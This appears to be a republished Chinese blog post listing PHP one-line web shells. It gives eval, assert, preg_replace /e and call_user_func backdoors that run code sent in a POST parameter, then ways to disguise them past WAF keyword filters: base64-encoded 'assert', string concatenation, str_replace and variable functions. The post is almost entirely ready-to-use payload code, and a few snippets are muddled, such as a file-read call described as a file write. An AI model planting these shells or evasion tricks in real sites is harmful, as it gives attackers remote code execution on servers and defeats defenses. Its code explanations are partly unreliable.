%3c php $str1=,PHP一句话木马 - osc_j8st6xb6的个人空间 - OSCHINA - 中文开源技术交流社区...

于 2021-03-21 01:36:26 发布
阅读量64 收藏
点赞数
文章标签: %3c php $str1=

PHP一句话木马:

1. eval():    <?php @eval($_POST['hacker']); ?>    eval函数将接受的字符串当做代码执行

2. assert(): 用法和 eval()一样

3. preg_replace(): <?php @preg_replace("/abcd/e",$_POST['hacker'],"abcdefg"); ?>    preg_replace 函数一个参数是一个正则表达式,按照 php的格式,表达式在两个/之间,如果在表达式末尾加上一个 e,则第二个参数就会被当做 php代码执行

4. create_function(): <?php

$newfun = create_function('$hacker', 'echo $hacker;');

$newfun('woaini');

?>

创建了一个匿名函数,并返回了一个独一无二的函数名

5. call_user_func(): <?php @call_user_func(eval,$_POST['hacker']); ?>    函数的第一个参数是被调动的函数,剩下的参数(可有多个参数)是被调用函数的参数

call_user_func_array(): 方法同上,只是第二个参数要是一个数组,作为第一个参数的参数

还有一些文件操作函数,比如 file_put_contents函数: <?php $test='一句话木马'; file_get_contents("文件名", $test); ?>

此函数把一个字符串写入一个文件中

怎么让一句话木马绕过 WAF:

WAF通常会以关键字判断是否为一句话木马,所以要将一句话木马变形使用,从而绕过 waf:

1. php变量函数:

$a = "assert";

$a($_POST['hacker']);

?>

2. php可变变量:

$b = "assert";

$a = 'b';

$$a($_POST['hacker']);

?>

3. str_replace函数:

$a = str_replace("b", "", "absbsbebrbt");

$a($_POST['hacker']);

?>

此函数用于将第三个参数中的第一个参数替换为第二个参数

4. base64_decode 函数:

$a = base64_decode("YXNzZXJ0");

$a($_POST['hacker']);

?>

5. 使用"."连接字符串:

$b = "a"."ss";

$c = "er"."t";

$a = $b.$c;

$a($_POST['hacker']);

?>

6. pares_str函数:

$str = "a=assert";

parse_str($str);/parse_str("a=assert");

$a($_POST['hacker']);

?>

最后举个例子:

function fun(){

return $_POST['hacker'];

}

@preg_replace("/test/e", fun(), "testtesttest");

?>

转载:https://bbs.ichunqiu.com/thread-26365-1-1.html

乐观文艺青年
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值